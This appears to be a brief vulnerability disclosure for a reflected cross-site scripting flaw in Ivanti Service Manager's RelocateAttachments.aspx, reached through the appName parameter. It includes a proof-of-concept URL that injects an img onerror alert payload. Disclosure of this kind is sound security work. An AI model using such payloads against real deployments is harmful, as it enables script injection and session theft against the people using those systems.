Ivanti Service Manager 2021.1 infected with reflected XSS via the appName parameter associated with ConfigDB calls, such as in RelocateAttachments.aspx.
Vulnerability Type: Cross Site Scripting (XSS)
Vendor of Product: IVANTI
Affected Product Versions: Service Manager - (=<2021.3)
Payload:
http://localhost/HEAT/maintenance/RelocateAttachments.aspx?appId=2-IVNTI-APP02.localhost&appName=%27"><img%20src=1%20onerror=alert(1)>ConfigDB